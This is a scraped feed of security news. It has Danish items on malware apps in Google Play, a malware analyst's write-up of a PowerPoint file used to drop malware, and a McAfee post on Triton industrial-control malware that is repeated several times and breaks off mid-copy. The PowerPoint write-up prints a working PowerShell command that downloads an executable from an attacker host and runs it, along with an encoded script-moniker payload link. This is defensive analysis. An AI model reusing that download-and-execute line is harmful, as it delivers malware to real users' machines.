The malware is believed to have been created by US and Israeli intelligence agencies. Stuxnet is designed to alter Programmable Logic Controllers (PLCs) used in the types of industrial control systems (ICS). The Stuxnet malware has made a powerful comeback after a hiatus of almost eight years, with a new variant, impacting Iranian networks.

Mere end 500.000 brugere har ifølge sikkerhedsforsker Lukas Stefanko, der er ansat hos antivirus-producenten ESET, hentet malware-inficerede apps fra Googles egen app-butik, Google Play.

Det drejer sig om 13 forskellige spil, der er skabt af den samme udvikler, som til sammen er hentet mere end en halv million gange.

Applikationen henter, ifølge sikkerhedsmanden, ondsindet kode fra en ekstern server og installerer malware på enheden, samtidig med at app-ikonet bliver slettet.

Sprog
Dansk

Læs mere om Sikkerhedsmand: 500.000 brugere har hentet spil-app med malware

Mere end 500.000 brugere har ifølge sikkerhedsforsker Lukas Stefanko, der er ansat hos antivirus-producenten ESET, hentet malware-inficerede apps til Android fra Googles egen app-butik, Google Play.

Det drejer sig om 13 forskellige spil, der er skabt af den samme udvikler, som til sammen er downloadet de mange gange.

Applikationen henter, ifølge sikkerhedsmanden, ondsindet kode fra en ekstern server og installerer malware på enheden, samtidig med at app-ikonet bliver slettet.

Sprog
Dansk

Keywords: mobilmobiltelefonGoogleAndroidLæs mere om Sikkerhedsmand: 500.000 brugere har hentet spil-app med malware

Marco Ramilli, founder and CEO at cyber security firm Yoroi has explained how to use Microsoft Powerpoint as Malware Dropper
Nowadays Microsoft office documents are often used to propagate Malware acting like dynamic droppers. Microsoft Excel embedding macros or Microsoft Word with user actions (like links or external OLE objects) are the main players in this “Office Dropping Arena”. When I figured out that a Microsoft Powerpoint was used to drop and to execute a Malicious payload I was amazed, it’s not so common (at least on my personal experiences), so I decided to write a little bit about it.

The “attack-path” is very close to what it’s observable on modern threats since years: eMail campaign with an attached document and actionable text on it. In the beginning, the Microsoft Powerpoint presentation looked like a white blank page but performing a very interesting and hidden connection to hxxps://a.doko.moe/wraeop.sct.

Analyzing the Microsoft Powerpoint structure it rises on my eyes the following slide structure

Microsoft Powerpoint dropper
Stage 1: Microsoft PowerPoint Dropping Website

An external OLEobject (compatibility 2006) was available on that value:

Target=”%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74″  

Decoding that string from HEX to ASCII is much more readable:

scrIPT:hxxps://a.dolo.moe/wraeop.sct

An external object is downloaded and executed like a script on the victim machine. The downloaded file (wraeop.sct) represents a Javascript code reporting the Stage 2 of the infection process. It’s showed as follows:

Microsoft Powerpoint dropper 2
Stage 2: Executed Javascript

Decoding the 3.6K script appears clear that one more Stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.

var run = new ActiveXObject(‘WSCRIPT.Shell’).Run(powershell  -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe’, ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’); Start-Process ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’ ); 

The script downloads a file named: AZZI.exe and saves it by a new name: VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe on a System temporary directory for running it. The downloaded PE Executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted a few hours later on VirusTotal.

Microsoft Powerpoint dropper 2

Microsoft Powerpoint dropper 4
Stage 3: .NET file

The Third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload or Stage 4. In other words Stage 3 reads an image placed under the internal resource of PE File, extracts and executes it. The final payload looks like AzoRult Malware. The evidence comes from traffic analysis where the identified pattern sends (HTTP POST) data on browser history and specifically crafted files under User – AppData to specific PHP pages. Moreover, the Command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZOrultV3.

Microsoft Powerpoint dropper 5
Microsoft Powerpoint dropper 6
Stage4: AZORult evidence

I hope you had fun on this, I did! It was super interesting to see the attacker’s creativity and the way the act to include malicious contents into Office Documents. Microsoft should probably take care of this and try to filter or to ask permissions before include external contents, but still, this will not be a complete solution (on my personal point of view). A more deep and invasive action would be needed to check the remote content. Stay tuned!

Indicators of Compromise (IoCs) for the malicious code are reported in the original analysis published by Marco Ramilli in his blog.

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

 

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans


Edited by Pierluigi Paganini

(Security Affairs – Microsoft Powerpoint, malware)

The post Using Microsoft Powerpoint as Malware Dropper appeared first on Security Affairs.

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we […]

Fighting ICS malware. ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS’s are now exposed to connected environments they were not designed for. Standard McAfee security recommendations (vulnerability….

Fighting ICS malware. ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS’s are now exposed to connected environments they were not designed for. Standard McAfee security recommendations (vulnerability….

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives.

img_1616611348770240.jpg

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.

ICS malware is usually sophisticated, requiring time to research its targets and sufficient resources. Attackers can be motivated by financial gain, hacktivism, or espionage, as well as for political ends, as we saw with Stuxnet. Since Stuxnet, researchers have discovered several industrial attacks; each year we seem to read about a worse threat than before.

In August 2017, a sophisticated malware targeted petrochemical facilities in the Middle East. The malware—dubbed Triton, Trisis, or HatMan—attacked safety instrumented systems (SIS), a critical component that has been designed to protect human life. The system targeted in that case was the Schneider Triconex SIS. The initial vector of infection is still unknown, but it was likely a phishing attack.

After gaining remote access, the Triton attackers moved to disrupt, take down, or destroy the industrial process. The goal of the attackers is still unclear because the attack was discovered after an accidental shutdown of the plant led to further investigation. Investigations conducted by several security companies have revealed a complex malware framework embedding PowerPC shellcode (the Triconex architecture) and an implementation of the proprietary communication protocol TriStation. The malware allowed the attackers to easily communicate with safety controllers and remotely manipulate system memory to inject shellcodes; they completely controlled the target. However, because the attack did not succeed it is possible that a payload, the final stage of the attack, was missing. All investigations pointed in this direction. If the final payload had been delivered, the consequences could have been disastrous.

History of ICS malware

In 2010, Stuxnet was one of the most sophisticated ICS threats discovered. This cyber weapon was created to target Iranian centrifuges. It was able to reprogram a particular programmable logic controller to change the speed of centrifuge rotations. The goal of Stuxnet was not to destroy but to take the control of the industrial process.

In 2013, the malware Havex targeted energy grids, electricity firms, and many others. The attackers collected a large amount of data and remotely monitored industrial systems. Havex was created for espionage and sabotage.

BlackEnergy was discovered in 2015. It targeted critical infrastructure and destroyed files stored on workstations and servers. In Ukraine, 230,000 people were left in the dark for six hours after hackers compromised several power distribution centers.

In 2015, IronGate was discovered on public sources. It targeted Siemens control systems and had functionalities similar to Stuxnet’s. It is unclear if this was a proof of concept or a simple penetration-testing tool.

Industroyer hit Ukraine again in 2016. The malware embedded a data wiper component as well as a distributed denial of services module. It was crafted for destruction. The attack caused a second shutdown of Ukraine’s power grid.

In 2017, Triton was discovered. The attack did not succeed; the consequences could have been disastrous.

ICS malware are critical because they infect industrial devices and automation. However, regular malware can also impact industrial process. Last year WannaCry forced several companies, from medical to automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.

Facing widespread risks, critical infrastructures need a specific approach to stay safe.

Triton framework

Triton targeted the Triconex safety controller, distributed by Schneider Electric. Triconex safety controllers are used in 18,000 plants (nuclear, oil and gas refineries, chemical plants, etc.), according to the company. Attacks on SIS require a high level of process comprehension (by analyzing acquired documents, diagrams, device configurations, and network traffic). SIS are the last protection against a physical incident.

The attackers gained access to the network probably via spear phishing, according to an investigation. After the initial infection, the attackers moved onto the main network to reach the ICS network and target SIS controllers.

To communicate with SIS controllers, attackers recoded the proprietary TriStation communication protocol on port UDP/1502. This step suggests they invested the time to reverse engineer the Triconex product.

Nozomi Networks has created a Wireshark dissector that is very handy for analyzing the TriStation protocol and detecting a Triton attack. The following screenshot shows an example of the information returned by the Triconex SIS. Triton requires the “running state” of the controller to perform the next stages of the attack.

In the preceding screen Triconex replies to the request “Get Control Program Status,” which is sent by Triton.

The Triton framework (dc81f383624955e0c0441734f9f1dabfe03f373c) posed as the legitimate executable trilog.exe, which collects logs. The executable is a python script compiled in an exe. The framework also contains library.zip (1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c), which contains all the python scripts required by Triton. Finally, two PowerPC shellcodes (the target architecture) are used to compromise the controllers. The first PowerPC shellcode is an injector (inject.bin, f403292f6cb315c84f84f6c51490e2e8cd03c686) used to inject the second stage (imain.bin, b47ad4840089247b058121e95732beb82e6311d0), the backdoor that allows read, write, and execute access on the Triconex product.

The following schema shows the main modules of Triton:

The missing payload has not been recovered during the forensic investigation. Because the attack was discovered early, it is possible that the attackers did not have time to launch the final stage.

How to detect an unusual network connection

Nozomi Networks has created a script that simulates a Triconex safety controller. We modified this script with a Raspberry Pi to create a cheap detector tool.

 

This inexpensive tool can be easily installed on an ICS network. If an illegitimate connection occurs, the device alerts with a blinking LED and siren. It also displays the IP address of the connection for further investigation.

The following picture shows how to connect the LED and buzzer.

Fighting ICS malware

ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS’s are now exposed to connected environments they were not designed for.

Standard McAfee security recommendations (vulnerability patching, complex passwords, identification control, security tools, etc.) remain the same as for regular networks, yet industrial systems also require specific procedures due to their importance. Industrial networks must be segregated from general business networks, and every machine connected to the industrial process should be carefully monitored by using strict access control and application whitelisting.

Further security recommendations:

Segregate physical and logical access to ICS networks with strong authentication, including strong passwords and double factor, card readers, surveillance cameras, etc.
Use DMZ and firewall to prevent network traffic from passing between the corporate and the ICS network
Deploy strong security measures on the ICS network perimeter, including patch management, disabling unused ports, and restricting ICS user privileges
Log and monitor every action on the ICS network to quickly identify a point of failure
When possible implement redundancy on critical devices to avoid major issues
Develop strong security policies and an incident response plan to restore systems during an incident
Train people with simulated incident responses and security awareness

Attackers learn what works from past attacks and from each other. Rapid developments in ICS threats make it crucial to stay protected. Manufacturers, plant operators, governments, and the cybersecurity industry must work together to avoid critical cyberattacks.

 

Indicators of compromise
dc81f383624955e0c0441734f9f1dabfe03f373c: trilog.exe
b47ad4840089247b058121e95732beb82e6311d0: imain.bin
f403292f6cb315c84f84f6c51490e2e8cd03c686: inject.bin
91bad86388c68f34d9a2db644f7a1e6ffd58a449: script_test.py
1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c: library.zip
97e785e92b416638c3a584ffbfce9f8f0434a5fd: TS_cnames.pyc
d6e997a4b6a54d1aeedb646731f3b0893aee4b82: TsBase.pyc
66d39af5d61507cf7ea29e4b213f8d7dc9598bed: TsHi.pyc
a6357a8792e68b05690a9736bc3051cba4b43227: TsLow.pyc
2262362200aa28b0eead1348cb6fda3b6c83ae01: crc.pyc
9059bba0d640e7eeeb34099711ff960e8fbae655: repr.pyc
6c09fec42e77054ee558ec352a7cd7bd5c5ba1b0: select.pyc
25dd6785b941ffe6085dd5b4dbded37e1077e222: sh.pyc
References

One Year After Triton: Building Ongoing, Industry-Wide Cyber Resilience



https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

New TRITON Analysis Tool: Wireshark Dissector for TriStation Protocol


https://github.com/NozomiNetworks/tricotools

The TRITON Malware Framework – Reverse-Engineering a Recent ICS Cyberattack




https://blog.talosintelligence.com/2017/07/template-injection.html
https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN

 

The post Triton Malware Spearheads Latest Generation of Attacks on Industrial Systems appeared first on McAfee Blogs.

img_1616611348770240.jpg

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.

ICS malware is usually sophisticated, requiring time to research its targets and sufficient resources. Attackers can be motivated by financial gain, hacktivism, or espionage, as well as for political ends, as we saw with Stuxnet. Since Stuxnet, researchers have discovered several industrial attacks; each year we seem to read about a worse threat than before.

In August 2017, a sophisticated malware targeted petrochemical facilities in the Middle East. The malware—dubbed Triton, Trisis, or HatMan—attacked safety instrumented systems (SIS), a critical component that has been designed to protect human life. The system targeted in that case was the Schneider Triconex SIS. The initial vector of infection is still unknown, but it was likely a phishing attack.

After gaining remote access, the Triton attackers moved to disrupt, take down, or destroy the industrial process. The goal of the attackers is still unclear because the attack was discovered after an accidental shutdown of the plant led to further investigation. Investigations conducted by several security companies have revealed a complex malware framework embedding PowerPC shellcode (the Triconex architecture) and an implementation of the proprietary communication protocol TriStation. The malware allowed the attackers to easily communicate with safety controllers and remotely manipulate system memory to inject shellcodes; they completely controlled the target. However, because the attack did not succeed it is possible that a payload, the final stage of the attack, was missing. All investigations pointed in this direction. If the final payload had been delivered, the consequences could have been disastrous.

History of ICS malware

In 2010, Stuxnet was one of the most sophisticated ICS threats discovered. This cyber weapon was created to target Iranian centrifuges. It was able to reprogram a particular programmable logic controller to change the speed of centrifuge rotations. The goal of Stuxnet was not to destroy but to take the control of the industrial process.

In 2013, the malware Havex targeted energy grids, electricity firms, and many others. The attackers collected a large amount of data and remotely monitored industrial systems. Havex was created for espionage and sabotage.

BlackEnergy was discovered in 2015. It targeted critical infrastructure and destroyed files stored on workstations and servers. In Ukraine, 230,000 people were left in the dark for six hours after hackers compromised several power distribution centers.

In 2015, IronGate was discovered on public sources. It targeted Siemens control systems and had functionalities similar to Stuxnet’s. It is unclear if this was a proof of concept or a simple penetration-testing tool.

Industroyer hit Ukraine again in 2016. The malware embedded a data wiper component as well as a distributed denial of services module. It was crafted for destruction. The attack caused a second shutdown of Ukraine’s power grid.

In 2017, Triton was discovered. The attack did not succeed; the consequences could have been disastrous.

ICS malware are critical because they infect industrial devices and automation. However, regular malware can also impact industrial process. Last year WannaCry forced several companies, from medical to automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.

Facing widespread risks, critical infrastructures need a specific approach to stay safe.

Triton framework

Triton targeted the Triconex safety controller, distributed by Schneider Electric. Triconex safety controllers are used in 18,000 plants (nuclear, oil and gas refineries, chemical plants, etc.), according to the company. Attacks on SIS require a high level of process comprehension (by analyzing acquired documents, diagrams, device configurations, and network traffic). SIS are the last protection against a physical incident.

The attackers gained access to the network probably via spear phishing, according to an investigation. After the initial infection, the attackers moved onto the main network to reach the ICS network and target SIS controllers.

To communicate with SIS controllers, attackers recoded the proprietary TriStation communication protocol on port UDP/1502. This step suggests they invested the time to reverse engineer the Triconex product.

Nozomi Networks has created a Wireshark dissector that is very handy for analyzing the TriStation protocol and detecting a Triton attack. The following screenshot shows an example of the information returned by the Triconex SIS. Triton requires the “running state” of the controller to perform the next stages of the attack.

In the preceding screen Triconex replies to the request “Get Control Program Status,” which is sent by Triton.

The Triton framework (dc81f383624955e0c0441734f9f1dabfe03f373c) posed as the legitimate executable trilog.exe, which collects logs. The executable is a python script compiled in an exe. The framework also contains library.zip (1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c), which contains all the python scripts required by Triton. Finally, two PowerPC shellcodes (the target architecture) are used to compromise the controllers. The first PowerPC shellcode is an injector (inject.bin, f403292f6cb315c84f84f6c51490e2e8cd03c686) used to inject the second stage (imain.bin, b47ad4840089247b058121e95732beb82e6311d0), the backdoor that allows read, write, and execute access on the Triconex product.

The following schema shows the main modules of Triton:

The missing payload has not been recovered during the forensic investigation. Because the attack was discovered early, it is possible that the attackers did not have time to launch the final stage.

How to detect an unusual network connection

Nozomi Networks has created a script that simulates a Triconex safety controller. We modified this script with a Raspberry Pi to create a cheap detector tool.

 

This inexpensive tool can be easily installed on an ICS network. If an illegitimate connection occurs, the device alerts with a blinking LED and siren. It also displays the IP address of the connection for further investigation.

The following picture shows how to connect the LED and buzzer.

Fighting ICS malware

ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS’s are now exposed to connected environments they were not designed for.

Standard McAfee security recommendations (vulnerability patching, complex passwords, identification control, security tools, etc.) remain the same as for regular networks, yet industrial systems also require specific procedures due to their importance. Industrial networks must be segregated from general business networks, and every machine connected to the industrial process should be carefully monitored by using strict access control and application whitelisting.

Further security recommendations:

Segregate physical and logical access to ICS networks with strong authentication, including strong passwords and double factor, card readers, surveillance cameras, etc.
Use DMZ and firewall to prevent network traffic from passing between the corporate and the ICS network
Deploy strong security measures on the ICS network perimeter, including patch management, disabling unused ports, and restricting ICS user privileges
Log and monitor every action on the ICS network to quickly identify a point of failure
When possible implement redundancy on critical devices to avoid major issues
Develop strong security policies and an incident response plan to restore systems during an incident
Train people with simulated incident responses and security awareness

Attackers learn what works from past attacks and from each other. Rapid developments in ICS threats make it crucial to stay protected. Manufacturers, plant operators, governments, and the cybersecurity industry must work together to avoid critical cyberattacks.

 

Indicators of compromise
dc81f383624955e0c0441734f9f1dabfe03f373c: trilog.exe
b47ad4840089247b058121e95732beb82e6311d0: imain.bin
f403292f6cb315c84f84f6c51490e2e8cd03c686: inject.bin
91bad86388c68f34d9a2db644f7a1e6ffd58a449: script_test.py
1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c: library.zip
97e785e92b416638c3a584ffbfce9f8f0434a5fd: TS_cnames.pyc
d6e997a4b6a54d1aeedb646731f3b0893aee4b82: TsBase.pyc
66d39af5d61507cf7ea29e4b213f8d7dc9598bed: TsHi.pyc
a6357a8792e68b05690a9736bc3051cba4b43227: TsLow.pyc
2262362200aa28b0eead1348cb6fda3b6c83ae01: crc.pyc
9059bba0d640e7eeeb34099711ff960e8fbae655: repr.pyc
6c09fec42e77054ee558ec352a7cd7bd5c5ba1b0: select.pyc
25dd6785b941ffe6085dd5b4dbded37e1077e222: sh.pyc
References

One Year After Triton: Building Ongoing, Industry-Wide Cyber Resilience



https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

New TRITON Analysis Tool: Wireshark Dissector for TriStation Protocol


https://github.com/NozomiNetworks/tricotools

The TRITON Malware Framework – Reverse-Engineering a Recent ICS Cyberattack




https://blog.talosintelligence.com/2017/07/template-injection.html
https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN

 

The post Triton Malware Spearheads Latest Generation of Attacks on Industrial Systems appeared first on McAfee Blogs.

img_1616611348770240.jpg

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.

ICS malware is usually sophisticated, requiring time to research its targets and sufficient resources. Attackers can be motivated by financial gain, hacktivism, or espionage, as well as for political ends, as we saw with Stuxnet. Since Stuxnet, researchers have discovered several industrial attacks; each year we seem to read about a worse threat than before.

In August 2017, a sophisticated malware targeted petrochemical facilities in the Middle East. The malware—dubbed Triton, Trisis, or HatMan—attacked safety instrumented systems (SIS), a critical component that has been designed to protect human life. The system targeted in that case was the Schneider Triconex SIS. The initial vector of infection is still unknown, but it was likely a phishing attack.

After gaining remote access, the Triton attackers moved to disrupt, take down, or destroy the industrial process. The goal of the attackers is still unclear because the attack was discovered after an accidental shutdown of the plant led to further investigation. Investigations conducted by several security companies have revealed a complex malware framework embedding PowerPC shellcode (the Triconex architecture) and an implementation of the proprietary communication protocol TriStation. The malware allowed the attackers to easily communicate with safety controllers and remotely manipulate system memory to inject shellcodes; they completely controlled the target. However, because the attack did not succeed it is possible that a payload, the final stage of the attack, was missing. All investigations pointed in this direction. If the final payload had been delivered, the consequences could have been disastrous.

History of ICS malware

In 2010, Stuxnet was one of the most sophisticated ICS threats discovered. This cyber weapon was created to target Iranian centrifuges. It was able to reprogram a particular programmable logic controller to change the speed of centrifuge rotations. The goal of Stuxnet was not to destroy but to take the control of the industrial process.

In 2013, the malware Havex targeted energy grids, electricity firms, and many others. The attackers collected a large amount of data and remotely monitored industrial systems. Havex was created for espionage and sabotage.

BlackEnergy was discovered in 2015. It targeted critical infrastructure and destroyed files stored on workstations and servers. In Ukraine, 230,000 people were left in the dark for six hours after hackers compromised several power distribution centers.

In 2015, IronGate was discovered on public sources. It targeted Siemens control systems and had functionalities similar to Stuxnet’s. It is unclear if this was a proof of concept or a simple penetration-testing tool.

Industroyer hit Ukraine again in 2016. The malware embedded a data wiper component as well as a distributed denial of services module. It was crafted for destruction. The attack caused a second shutdown of Ukraine’s power grid.

In 2017, Triton was discovered. The attack did not succeed; the consequences could have been disastrous.

ICS malware are critical because they infect industrial devices and automation. However, regular malware can also impact industrial process. Last year WannaCry forced several companies, from medical to automobile industries, to stop production. Some months later NotPetya hit nuclear power plants, power grids, and health care systems. In 2018, a cryptocurrency miner struck a water utility in Europe.

Facing widespread risks, critical infrastructures need a specific approach to stay safe.

Triton framework

Triton targeted the Triconex safety controller, distributed by Schneider Electric. Triconex safety controllers are used in 18,000 plants (nuclear, oil and gas refineries, chemical plants, etc.), according to the company. Attacks on SIS require a high level of process comprehension (by analyzing acquired documents, diagrams, device configurations, and network traffic). SIS are the last protection against a physical incident.

The attackers gained access to the network probably via spear phishing, according to an investigation. After the initial infection, the attackers moved onto the main network to reach the ICS network and target SIS controllers.

To communicate with SIS controllers, attackers recoded the proprietary TriStation communication protocol on port UDP/1502. This step suggests they invested the time to reverse engineer the Triconex product.

Nozomi Networks has created a Wireshark dissector that is very handy for analyzing the TriStation protocol and detecting a Triton attack. The following screenshot shows an example of the information returned by the Triconex SIS. Triton requires the “running state” of the controller to perform the next stages of the attack.

In the preceding screen Triconex replies to the request “Get Control Program Status,” which is sent by Triton.

The Triton framework (dc81f383624955e0c0441734f9f1dabfe03f373c) posed as the legitimate executable trilog.exe, which collects logs. The executable is a python script compiled in an exe. The framework also contains library.zip (1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c), which contains all the python scripts required by Triton. Finally, two PowerPC shellcodes (the target architecture) are used to compromise the controllers. The first PowerPC shellcode is an injector (inject.bin, f403292f6cb315c84f84f6c51490e2e8cd03c686) used to inject the second stage (imain.bin, b47ad4840089247b058121e95732beb82e6311d0), the backdoor that allows read, write, and execute access on the Triconex product.

The following schema shows the main modules of Triton:

The missing payload has not been recovered during the forensic investigation. Because the attack was discovered early, it is possible that the attackers did not have time to launch the final stage.

How to detect an unusual network connection

Nozomi Networks has created a script that simulates a Triconex safety controller. We modified this script with a Raspberry Pi to create a cheap detector tool.

 

This inexpensive tool can be easily installed on an ICS network. If an illegitimate connection occurs, the device alerts with a blinking LED and siren. It also displays the IP address of the connection for further investigation.

The following picture shows how to connect the LED and buzzer.

Fighting ICS malware

ICS malware has become more aggressive and sophisticated. Many industrial devices were built before anyone imagined cyberattacks such as Triton. ICS’s are now exposed to connected environments they were not designed for.

Standard McAfee security recommendations (vulnerability patching, complex passwords, identification control, security tools, etc.) remain the same as for regular networks, yet industrial systems also require specific procedures due to their importance. Industrial networks must be segregated from general business networks, and every machine connected to the industrial process should be carefully monitored by using strict access control and application whitelisting.

Further security recommendations:

Segregate physical and logical access to ICS networks with strong authentication, including strong passwords and double factor, card readers, surveillance cameras, etc.
Use DMZ and firewall to prevent network traffic from passing between the corporate and the ICS network
Deploy strong security measures on the ICS network perimeter, including patch management, disabling unused ports, and restricting ICS user privileges
Log and monitor every action on the ICS network to quickly identify a point of failure
When possible implement redundancy on critical devices to avoid major issues
Develop strong security policies and an incident response plan to restore systems during an incident
Train people with simulated incident responses and security awareness

Attackers learn what works from past attacks and from each other. Rapid developments in ICS threats make it crucial to stay protected. Manufacturers, plant operators, governments, and the cybersecurity industry must work together to avoid critical cyberattacks.

 

Indicators of compromise
dc81f383624955e0c0441734f9f1dabfe03f373c: trilog.exe
b47ad4840089247b058121e95732beb82e6311d0: imain.bin
f403292f6cb315c84f84f6c51490e2e8cd03c686: inject.bin
91bad86388c68f34d9a2db644f7a1e6ffd58a449: script_test.py
1dd89871c4f8eca7a42642bf4c5ec2aa7688fd5c: library.zip
97e785e92b416638c3a584ffbfce9f8f0434a5fd: TS_cnames.pyc
d6e997a4b6a54d1aeedb646731f3b0893aee4b82: TsBase.pyc
66d39af5d61507cf7ea29e4b213f8d7dc9598bed: TsHi.pyc
a6357a8792e68b05690a9736bc3051cba4b43227: TsLow.pyc
2262362200aa28b0eead1348cb6fda3b6c83ae01: crc.pyc
9059bba0d640e7eeeb34099711ff960e8fbae655: repr.pyc
6c09fec42e77054ee558ec352a7cd7bd5c5ba1b0: select.pyc
25dd6785b941ffe6085dd5b4dbded37e1077e222: sh.pyc
References

One Year After Triton: Building Ongoing, Industry-Wide Cyber Resilience



https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware

New TRITON Analysis Tool: Wireshark Dissector for TriStation Protocol


https://github.com/NozomiNetworks/tricotools

The TRITON Malware Framework – Reverse-Engineering a Recent ICS Cyberattack




https://blog.talosintelligence.com/2017/07/template-injection.html
https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN

 

The post Triton Malware Spearheads Latest Generation of Attacks on Industrial Systems appeared first on McAfee Blogs.

Malware that attacks industrial control systems (ICS), such as the Stuxnet campaign in 2010, is a serious threat. This class of cyber sabotage can spy on, disrupt, or destroy systems that manage large-scale industrial processes. An essential danger in this threat is that it moves from mere digital damage to risking human lives. In this post we will review the history of ICS malware, briefly examine how one ICS framework operates, and offer our advice on how to fight such threats.

ICS malware is usually sophisticated, requiring time to research its targets and sufficient resources. Attackers can be motivated by financial gain, hacktivism, or espionage, as well as for political ends, as we saw with Stuxnet. Since Stuxnet, researchers have discovered several industrial attacks; each year we seem to read about a worse threat than before.

In August 2017, a sophisticated malware targeted petrochemical facilities in the Middle East. The malware—dubbed Triton, Trisis, or HatMan—attacked safety instrumented systems (SIS), a critical component that has been designed to protect human life. The system targeted in that case was the Schneider Triconex SIS. The initial vector of infection is still unknown, but it was likely a phishing attack.

After gaining remote access, the Triton attackers moved to disrupt, take down, or destroy the industrial process. The goal of the attackers is still unclear because the attack was discovered after an accidental shutdown of the plant led to further investigation. Investigations conducted by several security companies have revealed a complex malware framework embedding PowerPC shellcode (the Triconex architecture) and an implementation of the proprietary communication protocol TriStation. The malware allowed the attackers to easily communicate with safety controllers and remotely manipulate system memory to inject shellcodes; they completely controlled the target. However, because the attack did not succeed it is possible that a payload, the final stage of the attack, was missing. All investigations pointed in this direction. If the final payload had been delivered, the consequences could have been disastrous.

History of ICS malware

In 2010, Stuxnet was one of the most sophisticated ICS threats discovered. This cyber weapon was created to target Iranian centrifuges. It was able to reprogram a particular programmable logic controller to change the speed of centrifuge rotations. The goal of Stuxnet was not to destroy but to take the control of the industrial process.

In 2013, the malware Havex targeted energy grids, electricity firms, and many others. The attackers collected a large amount of data and remotely monitored industrial systems. Havex was created for espionage and sabotage.

BlackEnergy was discovered in 2015. It targeted critical infrastructure and destroyed files stored on workstations and servers. In Ukraine, 230,000 people were left in the dark for six hours after hackers compromised several power distribution centers.

In 2015, IronGate was discovered on public sources. It targeted Siemens control systems and had functionalities similar to Stuxnet’s. It is unclear if this was a proof of concept or a simple penetration-testing tool.

Industroyer hit Ukraine again in 2016. The malware embedded a data wiper component as well as a distributed denial of services module. It was crafted for destruction. The attack caused a second shutdown of Ukraine’s power grid.

In 2017, Triton was discovered. The attack did not succeed; the consequences could have been disastrous.

